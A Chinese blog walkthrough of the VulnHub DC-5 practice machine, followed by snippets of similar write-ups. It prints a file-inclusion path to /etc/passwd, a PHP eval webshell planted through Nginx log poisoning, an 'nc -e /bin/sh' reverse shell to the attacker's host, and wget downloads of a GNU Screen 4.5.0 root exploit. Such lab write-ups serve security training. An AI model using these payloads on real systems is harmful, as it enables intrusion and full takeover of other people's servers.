靶机6 DC-5(过程超详细)

已于 2022-10-27 09:27:36 修改
阅读量812 收藏
点赞数 3
分类专栏: # 靶机 文章标签: 网络 安全 网络协议 压力测试
于 2022-09-26 12:05:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/127051255
版权

简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

1、下载靶场

靶机名称:DC-5(包含1个flag)

下载地址:

DC: 5 ~ VulnHub

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 DC-5 login 时表示安装成功)。

3、获取靶机的flag

前提:

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、DC-5和kali在同一网段 | 已知DC-5所在的网段

—— DC-5 IP地址:192.168.108.135/24

3.1信息收集

获取DC-5的IP地址

命令:netdiscover -r 192.168.108.129/24

由图可知DC-5的IP地址是:192.168.108.135/24

端口扫描

命令:nmap -sV -p- 192.168.108.135

//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

获取信息如下:

端口号

服务

版本

80

http

nginx 1.6.2

111

rpcbind

2-4

40547

status

1

3.2    渗透测试

查看一下80端口的http,并且对其进行CMS识别

发现这是一个类似于博客或者是公司简介一类的网站,依旧是没有识别到CMS

但是我们在最后一个页面 Contact 上看到了留言板,尝试xss之后发现并无回显的地方,使用burp抓包看看吧

使用burp抓包查看,发现是get的传参方式

直接使用sqlmap无法注入

sqlmap -u "http://192.168.108.135/thankyou.php?firstname=admin&lastname=admin&country=australia&subject=admin"

进行目录描扫,看看能不能拿到后台登陆的地址(实用工具dirb):dirb http://dc-5

由于发现使用dirb工具探测的不够全,使用dirsearch工具重新扫描一下

dirsearch -u "http://dc-5"

可以看到这里出现了三个php文件(index.php、thankyou.php、footer.php)

最后还是在留言板提交之后的页面发现了问题(在每此刷新此页面之后页面下方的时间都会发生变化)

同时,在php文件中发现了footer.php文件也是刷新就会变换时间,推测八成是thankyou.php对footer.php文件进行了文件包含

直接修改文件包含的路径进行尝试(参数改为 file=文件路径)

http://dc-5/thankyou.php?file=../../../../../../../../../../../../../etc/passwd

读取Nginx的错误日志文件(nginx 1.6.2 版本 的日志的地址 /var/log/nginx/error.log)

http://dc-5/thankyou.php?file=../../../../var/log/nginx/error.log

为了方便观察,直接ctrl+u

本来想看看这里会不会记录 agent、cookie,结果没有,但是访问的文件路径被记录了,那尝试挂个一句话木马使用蚁剑连接

尝试挂马(<?php @eval($_POST['webshell']);?>)

传参URL:http://dc-5/thankyou.php?file=<?php @eval($_POST["webshell"]); ?>

日志URL:http://dc-5/thankyou.php?file=../../../../var/log/nginx/error.log

可以看到是被加载进去了

使用蚁剑连接

http://192.168.108.136/thankyou.php?file=var/log/nginx/error.log

可能会不成功,尝试了几次的一句话木马注入才连接成功(因为中途靶机崩了,重新导入后IP地址发生了变化)

反弹shell

nc -e /bin/sh 192.168.108.129 6868

老套路了,改善一下shell交互的环境

python -c "import pty;pty.spawn('/bin/bash')"

继续收集信息

linux 3.16.0 Debian 3.16.51

查看能否进行suid提权的时候发现了一个有版本好的程序

find / -perm -4000 2>/dev/null #寻找有SUID权限(4000的文件,不显示其他的错误信息相当于过滤。

使用 searchsploit(kali自带的漏洞库)搜索 screen 4.5.0 的相关信息

使用 searchsploit -x linux/local/41154.sh 查看第一个 ,根据步骤制作文件

GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit     # 41154.sh 脚本文件内容

第三个文件的作用是用来执行前两个文件的,三个文件的执行顺序:dc-5 ——> libhax ——> rootshell

将做好的文件放在桌面,可以直接拖出来之后通过蚁剑上传至 DC-5 靶机

这里发现文件居然都无法上传,直接通过下载放在靶机里面(发现基本上都没有权限,只有在 /tmp/ 目录下写入成功了)

  • 在dc5目录下开启9999端口:python2 -m SimpleHTTPServer 9999
  • 靶机切换到/tmp目录,wget 172.20.10.3:5566/xxxx,下载这三个文件
    • wget 192.168.108.129:9999/dc5.sh
    • wget 192.168.108.129:9999/libhax.so
    • wget 192.168.108.129:9999/rootshell

提权

执行 dc5.sh 文件进行提权,

在 /root/ 目录下发现了flag

xjizhi(GG安全)
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1616
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【DC系列05】DC-5靶机复盘
weixin_44681307的博客
07-09 127
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。发现有两个可以利用的漏洞文件。
DC-5靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
05-27 716
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
DC5靶场
m0_62438849的博客
03-10 924
计算机 A 上的进程,调用另外一台计算机 B 上的进程,其中 A 上的调用进程被挂起,而 B 上的被调用进程开始执行,当值返回给 A 时,A 进程继续执行。100000 2,3,4 111/tcp rpcbind表明RPC编号为100000的服务(即rpcbind)的版本2、3、4在TCP协议的111端口上可用。(传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据)如果包含时间段,则第一个年份为第一次发布的年份,第二个是当前版本发布的年份。
vulnhub之DC5靶机
LainWith的博客
08-15 581
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC:5靶机通关详解
arcuied
04-17 237
DC:5靶机通关详解
内网渗透DC-5靶场通关
qq_35664104的博客
10-12 2403
个人博客地址:点我 DC系列共9个靶场,本次来试玩一下一个 DC-5,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-5: 192.168.31.107 Kali: 192.168.31.18 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、111
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC-4靶机提权详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
【DC5靶场通关详细记录】
博客
12-18 1149
dc5靶场通关记录---文件包含漏洞,screen漏洞提权
DC系列5靶机实战
qq_43462485的博客
10-28 601
DC-5靶机实战 攻击机:kali 192.168.43.16 目标机:dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现,然后使用nmap进行端口扫描 2.发现开放80端口的web服务,溜了一圈没找到什么信息,还是参考了一下大佬的思路 发现提交contact信息后每次刷新thank you的界面下面的数值都会变化,第一次遇到这种类型 参考大佬后发现可能是LFI(本地文件包含)漏洞 3.通过burp抓包,对参数进行
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 150
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
【VulnHub系列】DC-5靶机
薛定谔嘚喵博客
03-10 249
DC-5靶机
DC-5入门练习
Mr_helloword的博客
07-20 557
DC-5靶机渗透 1. 信息收集 1.查看dc-5主机mac地址 2. nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A 发现目标靶机地址为192.168.1.6 查看目标主机开放那些端口 由于开发80我们登录随便看一看 这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里) 发现每次刷新网页下面都会变化 2.御剑扫描
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 986
DC-5
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4857
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值